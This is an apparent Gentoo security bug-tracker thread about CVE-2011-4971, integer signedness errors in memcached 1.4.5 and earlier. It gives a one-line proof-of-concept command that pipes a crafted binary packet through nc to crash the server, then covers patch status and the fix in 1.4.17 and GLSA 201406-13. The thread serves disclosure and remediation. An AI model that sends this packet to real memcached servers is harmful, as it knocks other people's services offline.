From ${URL} : This was originally reported by Stefan Bucur: 1. Start memcached in TCP mode. For example: $ ./memcached -v -p 11211 -U 0 2. Send the specially crafted packet to it: $ echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211 ==== There is a patch mentioned in the original issue report, but the code has changed significantly since then. External references: https://code.google.com/p/memcached/issues/detail?id=192 http://insecurety.net/?p=872 @maintainer(s): after the bump, in case we need to stabilize the package, please say explicitly if it is ready for the stabilization or not
There is a suggested (but untested and unmerged) patch at [1], a comment from the issue Ago linked. [1] https://code.google.com/p/memcached/issues/detail?id=192#c19
CVE-2011-4971 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4971): Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_append_prepend functions in Memcached 1.4.5 and earlier allow remote attackers to cause a denial of service (crash) via a large body length value in a packet.
The bug is fixed in 1.4.16 as per upstream. Adding to existing GLSA
Sorry 1.4.17 not 1.4.16
This issue was resolved and addressed in GLSA 201406-13 at http://security.gentoo.org/glsa/glsa-201406-13.xml by GLSA coordinator Chris Reffett (creffett).
